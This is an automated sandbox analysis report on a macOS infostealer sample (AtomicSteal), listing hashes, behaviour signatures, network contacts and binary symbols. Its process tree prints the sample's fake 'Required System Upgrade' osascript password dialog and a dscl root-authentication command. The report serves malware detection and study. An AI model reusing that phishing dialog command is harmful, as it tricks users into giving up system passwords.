Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

macOS Analysis Report
1rNsYj4HBT

Overview

General Information

Sample Name:1rNsYj4HBT
Analysis ID:1323173
MD5:a1a7891c4b4cd308e31c2c62860c8581
SHA1:07fb38e48529490da73dcb9a0812bd3bb3337189
SHA256:6af663985f92966477bc68047e621675b26eb3f9626d8b7c0e2537b3211b118a
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Contains symbols with suspicious names likely related to encryption
Contains symbols with suspicious names likely related to networking
Uses AppleScript framework/components containing Apple Script related functionalities
Reads the systems hostname
Reads hardware related sysctl values
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads launchservices plist files
Sample is a FAT Mach-O sample containing binaries for multiple architectures
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Classification

General Information

Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1323173
Start date and time:2023-10-10 20:28:16 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Virtual Machine, High Sierra (Office 2016 16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:10.13
CPU architecture:x86_64
Analysis Mode:default
Sample file name:1rNsYj4HBT
Detection:MAL
Classification:mal48.mac@0/0@0/0

Warnings

  • Excluded IPs from analysis (whitelisted): 17.253.83.196, 17.253.83.200, 23.39.1.85, 17.253.83.195, 17.253.83.198, 17.253.82.125, 17.253.82.253, 17.253.4.253
  • Excluded domains from analysis (whitelisted): cds-cdn.v.aaplimg.com, e11408.d.akamaiedge.net, cds.apple.com.akadns.net, time-macos.apple.com, ocsp-a.g.aaplimg.com, fbs.smoot.apple.com, cds.apple.com, help-ar.apple.com.edgekey.net, valid.apple.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, ocsp-lb.apple.com.akadns.net, ocsp.apple.com, glb-fbs.v.aaplimg.com, valid.origin-apple.com.akadns.net, help.origin-apple.com.akadns.net, valid-apple.g.aaplimg.com, time.g.aaplimg.com, help.apple.com, world-gen.g.aaplimg.com
  • VT rate limit hit for: 1rNsYj4HBT

Runtime Messages

Command:/Users/berri/Desktop/1rNsYj4HBT
PID:897
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:<dscl_cmd> DS Error: -14090 (eDSAuthFailed)

Process Tree

  • System is macvm-highsierra
  • 1rNsYj4HBT (MD5: a1a7891c4b4cd308e31c2c62860c8581) Arguments: /Users/berri/Desktop/1rNsYj4HBT
    • sh New Fork (PID: 898, Parent: 897)
    • dscl (MD5: 2072d2ac07a471913b06fed4b4bd55cf) Arguments: dscl . authonly root
    • sh New Fork (PID: 899, Parent: 897)
    • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answer
  • cleanup

Yara Signatures

No yara matches

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 1rNsYj4HBTReversingLabs: Detection: 31%
Source: submission: 1rNsYj4HBTMach-O symbol: _mz_zip_reader_is_file_encrypted
Source: submission: 1rNsYj4HBTMach-O symbol: _mz_zip_reader_is_file_encrypted
Source: unknownHTTPS traffic detected: 100.22.10.168:443 -> 192.168.11.11:49398 version: TLS 1.2
Source: unknownHTTPS traffic detected: 100.22.10.168:443 -> 192.168.11.11:49400 version: TLS 1.2
Source: submission: 1rNsYj4HBTMach-O symbol: _send
Source: submission: 1rNsYj4HBTMach-O symbol: _send_data_via_http
Source: submission: 1rNsYj4HBTMach-O symbol: _socket
Source: submission: 1rNsYj4HBTMach-O symbol: _inet_addr
Source: submission: 1rNsYj4HBTMach-O symbol: _connect
Source: submission: 1rNsYj4HBTMach-O symbol: _send
Source: submission: 1rNsYj4HBTMach-O symbol: _send_data_via_http
Source: submission: 1rNsYj4HBTMach-O symbol: _socket
Source: submission: 1rNsYj4HBTMach-O symbol: _inet_addr
Source: submission: 1rNsYj4HBTMach-O symbol: _connect
Source: unknownNetwork traffic detected: HTTP traffic on port 49398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49398
Source: unknownNetwork traffic detected: HTTP traffic on port 49400 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.83.202
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.83.202
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.151.53
Source: unknownTCP traffic detected without corresponding DNS query: 23.47.151.53
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
Source: unknownHTTPS traffic detected: 100.22.10.168:443 -> 192.168.11.11:49398 version: TLS 1.2
Source: unknownHTTPS traffic detected: 100.22.10.168:443 -> 192.168.11.11:49400 version: TLS 1.2
Source: classification engineClassification label: mal48.mac@0/0@0/0
Source: /usr/bin/osascript (PID: 899)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 899)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
Source: /bin/sh (PID: 899)Osascript command executed: osascript -e display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answerJump to behavior
Source: /Users/berri/Desktop/1rNsYj4HBT (PID: 897)Shell command executed: sh -c dscl . authonly 'root' ''Jump to behavior
Source: /Users/berri/Desktop/1rNsYj4HBT (PID: 897)Shell command executed: sh -c osascript -e 'display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answer'Jump to behavior
Source: /usr/bin/osascript (PID: 899)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: submissionFile header: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>]
Source: /usr/bin/osascript (PID: 899)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 899)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 899)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 899)Random device file read: /dev/randomJump to behavior
Source: submissionMach-O header: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>]
Source: /usr/bin/osascript (PID: 899)Sysctl read request: kern.safeboot (1.66)Jump to behavior
Source: /bin/sh (PID: 898)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 899)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/osascript (PID: 899)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Source: /usr/bin/osascript (PID: 899)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Scripting		Path InterceptionPath Interception1
Scripting		OS Credential Dumping41
System Information Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts3
AppleScript		Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


cam-macmac-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1rNsYj4HBT32%ReversingLabsMacOS.Trojan.AtomicSteal

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com
100.22.10.168
truefalse
    		high

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    100.22.10.168
    		pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.comUnited States
    		16509AMAZON-02USfalse
    23.47.151.53
    		unknownUnited States
    		16625AKAMAI-ASUSfalse

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    100.22.10.168Zotero-6.0.26.dmgGet hashmaliciousUnknownBrowse

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.comZotero-6.0.26.dmgGet hashmaliciousUnknownBrowse
      • 100.22.10.168

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      AKAMAI-ASUShttp://tzpzc.com/trf?&o=PkV%2FfIF95ILQvyFgblH9Ol3NrsHx3OEaKBBSgjGel2%2BTCQ5c2ZAziekbrSMwRY5vHSCauPfAZaoBDSAsoBBymQJLHT3X%2FzLEqOnnal9WZf6SJ7Td3s1dEnDaJEVWDQ2Y1Ahv41uK2qYeAmld79weSB5rIIBTPwM4%2Fbg8axtLbC66%2Baa3ACkjrvZQbEjiQbkZkY5BJn9BaiIK4VO%2FcWPk%2BTPHUbTDCxuH00ucIojB8%2B4%2F5j84OxPqsd5I7OgSaL%2FG7c03dilBymEV3T0%2BJF8nFJG5BHz3ShBbNSgRoaqb9KfsDRxGnYNfsf5zBXgwjnOIAJ7DdFNd4iuxq%2BBCMDbobsCecsBP7xiKVMDPcniD45sw31N%2BBjfTuYH5Squi9ZKUUE2Vsj%2F9mU3Aa9GJnt0biL3v%2FbeLKvzYrAtN5gZnEaHzxlWHXJArBP5uzqr%2BaMumb42evLWsXtoJRbjrqQzVNrqa0zbIadiGmRZWZWaP2f%2FptviR%2BkCJRvAwDdmcH7ChWeM5xD9ss6HHxa1tvQ2GDlalm1CiHp41spHDvXzFZOiEIzia0hdh91xa5NHu7LDxda8u0ZL0xhG%2FhGa7nRqZbw%3D%3D&c=21324440658170625328871&n=vaFaXA748HARlTtkQFq7EHTvL0yTeVphyIuQ76K72qtDCNA8G6JV3G1Nbd7CR1LcM3y1RH749U42GGplW8Y408EV0eqIT0VKgDxQEnYG9Xs%2FhzadvrG8TLK5c74Pum8KmrAqcy3UlSzpQJiL2ZCwgdcz1TH1ixSNEZhDRd0eEbRjIiWF6vlECaMLk3pTTfO55BaAlHm1g%2BL8KSh2IYvu%2FQc0XTNkrmyc3MOvCXqXo7zfKmrKt1gSFf2GTJqwaxHJbmS%2Fs%2F6Fojw1ngiFgKRjd%2FmGRomnTuNHSKJecv3QItGJ6cNIJhIrY8N8VkNF0Get hashmaliciousUnknownBrowse
      • 104.85.244.86
      https://goo.su/PNCCz1UGet hashmaliciousUnknownBrowse
      • 23.1.244.183
      SOA_OCT.xlsGet hashmaliciousUnknownBrowse
      • 23.3.84.164
      hbqK0qfLnv.elfGet hashmaliciousMiraiBrowse
      • 184.31.203.169
      DIS_AGENCY_MANAGER_JOB_DETAILS_INTERVIEWING_2023_0_pdf_lnk.lnkGet hashmaliciousUnknownBrowse
      • 23.196.112.115
      b3astmode.arm7.elfGet hashmaliciousMiraiBrowse
      • 104.125.22.117
      b3astmode.arm.elfGet hashmaliciousMiraiBrowse
      • 104.113.9.240
      Ach_Payment.htmlGet hashmaliciousHTMLPhisherBrowse
      • 173.222.162.7
      Important cyeager@live-quinn.com Notification 10 6 2023 9 28 38 PM.emlGet hashmaliciousUnknownBrowse
      • 72.247.96.29
      https://p.feedblitz.com/t3/882921/109614235/13473938/https://viewfromthewing.com/airbnb-guest-stayed-500-nights-and-demanded-100000-to-leave-because-california/Get hashmaliciousUnknownBrowse
      • 184.28.98.86
      https://ucarecdn.com/0a6fa038-e00c-4182-840a-2ccccdd13e91/adobe2.htmlGet hashmaliciousHTMLPhisherBrowse
      • 184.28.98.99
      http://www.auctiva.com/email/ta.aspx?uid=1972697&sid=0&eid=896379865&mid=14&aid=-1&ein=141929408795&dest=//shaadiweds.com/vendor/yYHQMfEH/x4vp45yz/dGVzdC50ZXN0QHRlc3QuY29tGet hashmaliciousUnknownBrowse
      • 23.51.194.132
      sNucBkrHmX.exeGet hashmaliciousGlupteba, SmokeLoader, Stealc, XmrigBrowse
      • 184.50.42.33
      file.exeGet hashmaliciousGlupteba, SmokeLoader, Stealc, Vidar, XmrigBrowse
      • 184.50.42.33
      TDJafFthUh.elfGet hashmaliciousMiraiBrowse
      • 104.116.58.220
      YTeU5j9j5i.elfGet hashmaliciousUnknownBrowse
      • 23.9.191.218
      F6l1mPmpDX.elfGet hashmaliciousMiraiBrowse
      • 23.37.155.22
      IYI7vYH8su.elfGet hashmaliciousUnknownBrowse
      • 23.15.233.53
      9pbDW7cdoz.elfGet hashmaliciousMiraiBrowse
      • 104.100.236.254
      Awh7g0B8Qe.elfGet hashmaliciousMiraiBrowse
      • 184.84.198.207
      AMAZON-02UShttp://4jv2zzt96ihx7ht2xox7.1yyq2tt.ruGet hashmaliciousUnknownBrowse
      • 3.22.228.104
      http://tzpzc.com/trf?&o=PkV%2FfIF95ILQvyFgblH9Ol3NrsHx3OEaKBBSgjGel2%2BTCQ5c2ZAziekbrSMwRY5vHSCauPfAZaoBDSAsoBBymQJLHT3X%2FzLEqOnnal9WZf6SJ7Td3s1dEnDaJEVWDQ2Y1Ahv41uK2qYeAmld79weSB5rIIBTPwM4%2Fbg8axtLbC66%2Baa3ACkjrvZQbEjiQbkZkY5BJn9BaiIK4VO%2FcWPk%2BTPHUbTDCxuH00ucIojB8%2B4%2F5j84OxPqsd5I7OgSaL%2FG7c03dilBymEV3T0%2BJF8nFJG5BHz3ShBbNSgRoaqb9KfsDRxGnYNfsf5zBXgwjnOIAJ7DdFNd4iuxq%2BBCMDbobsCecsBP7xiKVMDPcniD45sw31N%2BBjfTuYH5Squi9ZKUUE2Vsj%2F9mU3Aa9GJnt0biL3v%2FbeLKvzYrAtN5gZnEaHzxlWHXJArBP5uzqr%2BaMumb42evLWsXtoJRbjrqQzVNrqa0zbIadiGmRZWZWaP2f%2FptviR%2BkCJRvAwDdmcH7ChWeM5xD9ss6HHxa1tvQ2GDlalm1CiHp41spHDvXzFZOiEIzia0hdh91xa5NHu7LDxda8u0ZL0xhG%2FhGa7nRqZbw%3D%3D&c=21324440658170625328871&n=vaFaXA748HARlTtkQFq7EHTvL0yTeVphyIuQ76K72qtDCNA8G6JV3G1Nbd7CR1LcM3y1RH749U42GGplW8Y408EV0eqIT0VKgDxQEnYG9Xs%2FhzadvrG8TLK5c74Pum8KmrAqcy3UlSzpQJiL2ZCwgdcz1TH1ixSNEZhDRd0eEbRjIiWF6vlECaMLk3pTTfO55BaAlHm1g%2BL8KSh2IYvu%2FQc0XTNkrmyc3MOvCXqXo7zfKmrKt1gSFf2GTJqwaxHJbmS%2Fs%2F6Fojw1ngiFgKRjd%2FmGRomnTuNHSKJecv3QItGJ6cNIJhIrY8N8VkNF0Get hashmaliciousUnknownBrowse
      • 13.226.230.185
      https://sites.google.com/view/pdfreader365?usp=sharingGet hashmaliciousUnknownBrowse
      • 52.30.234.205
      https://padlet.com/keith195/bay-alarm-company-k9xoqkg6zsny4mfmGet hashmaliciousUnknownBrowse
      • 13.33.21.48
      0d1pbS7iS5.elfGet hashmaliciousUnknownBrowse
      • 52.28.67.56
      qWRPhfG8ma.elfGet hashmaliciousUnknownBrowse
      • 44.234.206.55
      https://goo.su/PNCCz1UGet hashmaliciousUnknownBrowse
      • 35.177.4.157
      https://www.3ds.com/products-services/catia/products/no-magic/cameo-enterprise-architecture/Get hashmaliciousHtmlDropperBrowse
      • 15.236.116.153
      https://staquinas.com/Get hashmaliciousUnknownBrowse
      • 18.244.220.86
      http://smtplink.usssa.com/ls/click?upn=WSslNwXrfTzmOiygdbhyJ6-2FBkqSXpJKBo0qDJw7VpA0ad0aSHI26IfGEk6sZrui2bNaUSMTnBYnYVENpD3iJXlQkXPfcSbOBORBXNLksKRU-3Dvq6B_ZZ91ACal-2BJJoJx14DMl1oTF9qepk3QnOGUIUFLCWHbM90Oov53wie0ARDWaOmFV8OnsBJinVX5Ri1CFawAPbMBRNxwFoOBBmwGdl1p0En-2Bkx7W42TomtZBQPBZZ3y8tCmTcGSv5Xr8qKoSGMq5-2BnAQybkb8N2WUkTA4BiPdXRonrkkhKg0S6t4Zc3zm2QqnbgpPZDcZ958dHnxdcbVzPPA-3D-3DGet hashmaliciousUnknownBrowse
      • 13.226.210.26
      https://walling.app/aLrsybEEt1SwgXnGj2pC/untitled&c=E,1,XkzyqB5uOtgcMuXVB73eBMVjSCz03HkHR2Q2lG8fONaTJakYnuQW--j_qOaCYLjXKylc5DHP8iv0BitrzBhWjuHD50kEgM2It-1X2ioTJkemZ2QEhrWZiZ3MqQ,,&typo=1Get hashmaliciousUnknownBrowse
      • 3.11.1.95
      http://smtplink.usssa.com/ls/click?upn=WSslNwXrfTzmOiygdbhyJ6-2FBkqSXpJKBo0qDJw7VpA0ad0aSHI26IfGEk6sZrui2mvemosWCqpqUOj0cVBzMRXgCLLrk122U5KszoRZ7OXszAlJ3Hc2txQ9O6JXN5aL-2FVbyO_Or2Q2u2JXBZ0XaNMO-2BXflMTh43-2FLshk9B5iUbkb6sBE4dZmKUcNdO1ojD80iUFXhnK6rIXXpkLuPQ94QTaC2cQLacrEtgcwNb9A-2Bypo-2BFhGfvvMO7jVIrPuBwh5CAUzhAXUZD8-2BqijwUTfiQUil16WO7AxoFBUa2vQLgTQgB0vZJ0r7cJ00pjpoplqm2gKSenn2zBMijznbp-2BFFQNBh-2FKDbXNFto2e-2FwaILZF5FbIdo-3DGet hashmaliciousUnknownBrowse
      • 35.163.144.222
      http://ulssbl.itGet hashmaliciousUnknownBrowse
      • 63.32.3.30
      b64.htmGet hashmaliciousUnknownBrowse
      • 13.226.225.72
      Statement.htmlGet hashmaliciousHTMLPhisherBrowse
      • 13.225.142.14
      https://manitowoc-ice.za.net/Get hashmaliciousUnknownBrowse
      • 13.226.251.13
      Ordem_de_Compra.exeGet hashmaliciousFormBookBrowse
      • 44.230.85.241
      b63.htmGet hashmaliciousHTMLPhisherBrowse
      • 13.225.142.22
      http://click.swiftpage.marketing/s/052-ce63ad86-6dfd-4511-bb95-8f03be5c353a?enr=naahiaduabyaa4yahiac6abpabxqa2aaneag6abnabsaaziammagwadtaaxaayyan4ag2abpabuqa3iam4ahyadnab4qazaan4ahoadoabwaa3yameagiadtaa2aanaagiaeaadhabwqayianeagyaboabrqa3yanuahyabrab6aa7aagaadkabsaawqayyamuadmabtabqqazaahaadmabnaa3aazaamyagiabnaa2aaniageadcabnabraayqaheadkabnaa4aazqagaadgadcabsqaniammadgabvaazqayiapqadaabvaa4qaliameadgadcaa3aamaagqagcabuaawqamaagyagmabraawqanaag4adcabxaawqaoiagiagiaddaawqamqagqadqabrabsaamyag4adoabzabsqamqagmahyabqaayaamiafuadoabvaazaanqagiaggadeaayqaliagiadkabwaazqaliagqagiabtaa4aaliahaagiabsabqqaliagqaggabyaa2aayiamqadcadfabsqayyahaagcad4ab6aaqiapqaa====Get hashmaliciousUnknownBrowse
      • 44.237.85.175
      wiUnP1h5Ex.exeGet hashmaliciousNjratBrowse
      • 3.68.171.119

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      3e4e87dda5a3162306609b7e330441d2http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168
      http://zx.paymentsmusic.comGet hashmaliciousUnknownBrowse
      • 100.22.10.168

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>]
      Entropy (8bit):5.300390215374691
      TrID:
      • Mac OS X Universal Binary executable (4004/1) 75.96%
      • HSC music composer song (1267/141) 24.04%
      File name:1rNsYj4HBT
      File size:442'038 bytes
      MD5:a1a7891c4b4cd308e31c2c62860c8581
      SHA1:07fb38e48529490da73dcb9a0812bd3bb3337189
      SHA256:6af663985f92966477bc68047e621675b26eb3f9626d8b7c0e2537b3211b118a
      SHA512:d2f5b550c046f978e591a62333278c493e144a8bb3273de1c73f383fa8cbad3cefd41a794d0b5229ae7395eb80351dd40993c38fccbdde1cc1e8d507dc929816
      SSDEEP:6144:loH+fhNBhS7TF70JApF8y4wWvNzbm7Qso1XFq4k24wR:lok8TFUi54wWFzbm7k1XFzl4wR
      TLSH:FD942A55932DF812E1D6E0B2BBC5C7E2E414F23404B0915F7B8D97BABFB2A856816703
      File Content Preview:..................@...+ ..................>....................................................................................................................................................................................................................

      Static Mach Info

      General Information for header 1
      Endian:little-endian
      Size:64-bit
      Architecture:x86_64
      Filetype:execute
      Nbr. of load commands:13
      Entry point:0x1000042A0
      segment_command_64 aggregated: 4
      NameValue
      segname__PAGEZERO
      vmaddr0x0
      vmsize0x100000000
      fileoff0x0
      filesize0x0
      maxprot0x0
      initprot0x0
      nsects0
      flags0x0
      NameValue
      segname__TEXT
      vmaddr0x100000000
      vmsize0x2C000
      fileoff0x0
      filesize0x2C000
      maxprot0x5
      initprot0x5
      nsects7
      flags0x0
      Datas
      sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
      __text__TEXT0x1000042A00x230A30x42A05.40650x40x000x80000400
      __stubs__TEXT0x1000273440xF00x273443.27020x10x000x80000408
      __stub_helper__TEXT0x1000274340x1E00x274344.35930x20x000x80000400
      __cstring__TEXT0x1000276140x160C0x276145.11860x00x000x2
      __const__TEXT0x100028C200x14600x28C204.97120x40x000x0
      __unwind_info__TEXT0x10002A0800x800x2A0803.00390x20x000x0
      __eh_frame__TEXT0x10002A1000x1EF80x2A1003.56740x30x000x0
      NameValue
      segname__DATA
      vmaddr0x10002C000
      vmsize0x4000
      fileoff0x2C000
      filesize0x4000
      maxprot0x3
      initprot0x3
      nsects6
      flags0x0
      Datas
      sectnamesegnameaddrsizeoffsetentropyalignreloffnrelocflags
      __dyld__DATA0x10002C0000x100x2C0002.64940x30x000x0
      __got__DATA0x10002C0100x180x2C010-0.00000x30x000x6
      __la_symbol_ptr__DATA0x10002C0280x1400x2C0282.77930x30x000x7
      __data__DATA0x10002C1700x8F30x2C1704.61850x40x000x0
      __common__DATA0x10002CC000x4700x00.00000x90x000x1
      __bss__DATA0x10002D0700x80x00.00000x30x000x1
      NameValue
      segname__LINKEDIT
      vmaddr0x100030000
      vmsize0x4000
      fileoff0x30000
      filesize0x2B20
      maxprot0x1
      initprot0x1
      nsects0
      flags0x0
      symtab_command aggregated: 1
      NameValue
      symoff196952
      nsyms275
      stroff201688
      strsize5960
      dysymtab_command aggregated: 1
      NameValue
      ilocalsym0
      nlocalsym69
      iextdefsym69
      nextdefsym163
      iundefsym232
      nundefsym43
      tocoff0
      ntoc0
      modtaboff0
      nmodtab0
      extrefsymoff0
      nextrefsyms0
      indirectsymoff201352
      nindirectsyms83
      extreloff0
      nextrel0
      locreloff0
      nlocrel0
      dylinker_command aggregated: 1
      NameValue
      name12
      Datas/usr/lib/dyld
      uuid_command aggregated: 1
      NameValue
      uuidb'\xafj?\xc5\xec\xcd2\xd0\xb84\xb5\x0fb\xa5\x1c\xa4'
      version_min_command aggregated: 1
      NameValue
      version656384
      sdk852224
      thread_command aggregated: 1
      NameValue
      flavor4
      count42
      dylib_command aggregated: 1
      NameValue
      name24
      timestampThu Jan 1 01:00:02 1970
      current_version1319.0.0
      compatibility_version1.0.0
      Datas/usr/lib/libSystem.B.dylib
      linkedit_data_command aggregated: 2
      NameValue
      dataoff196608
      datasize328
      NameValue
      dataoff196936
      datasize16
      Internal Symbols
      _GrabFolder
      _GrabTox
      _NXArgc
      _NXArgv
      _SearchAndGrabChromium
      _TDEFL_READ_UNALIGNED_WORD
      _TDEFL_READ_UNALIGNED_WORD2
      _TDEFL_READ_UNALIGNED_WORD32
      _Telegram
      ___assert_rtn
      ___keymgr_dwarf2_register_sections
      ___progname
      __cthread_init_routine
      __dyld_func_lookup
      __free
      __getenv
      __malloc
      __memcpy
      __memset
      __mh_execute_header
      __start
      __strcat
      __strcmp
      __strcpy
      __strlen
      __strncmp
      __strpbrk
      __strtok
      __strtok.next_token
      _atexit
      _checkvalid
      _close
      _closedir
      _connect
      _environ
      _errno
      _exec
      _exit
      _fclose
      _ff_parsedata
      _fflush
      _fgmode
      _fopen
      _fread
      _free
      _free_list
      _freopen
      _fseeko
      _fsize
      _ftello
      _fwrite
      _getPlugWallets
      _getpagesize
      _getpwd
      _inet_addr
      _is_directory
      _localtime
      _mach_init_routine
      _main
      _malloc
      _masterpass
      _memcmp
      _memcpy
      _memset
      _miniz_def_alloc_func
      _miniz_def_free_func
      _miniz_def_realloc_func
      _mktime
      _mmap
      _mz_adler32
      _mz_bitmasks
      _mz_compress
      _mz_compress2
      _mz_compressBound
      _mz_crc32
      _mz_crc32.s_crc_table
      _mz_deflate
      _mz_deflateBound
      _mz_deflateEnd
      _mz_deflateInit
      _mz_deflateInit2
      _mz_deflateReset
      _mz_error
      _mz_error.s_error_descs
      _mz_file_read_func_stdio
      _mz_free
      _mz_inflate
      _mz_inflateEnd
      _mz_inflateInit
      _mz_inflateInit2
      _mz_inflateReset
      _mz_uncompress
      _mz_uncompress2
      _mz_version
      _mz_zip_add_mem_to_archive_file_in_place
      _mz_zip_add_mem_to_archive_file_in_place_v2
      _mz_zip_array_ensure_capacity
      _mz_zip_clear_last_error
      _mz_zip_compute_crc32_callback
      _mz_zip_dos_to_time_t
      _mz_zip_end
      _mz_zip_extract_archive_file_to_heap
      _mz_zip_extract_archive_file_to_heap_v2
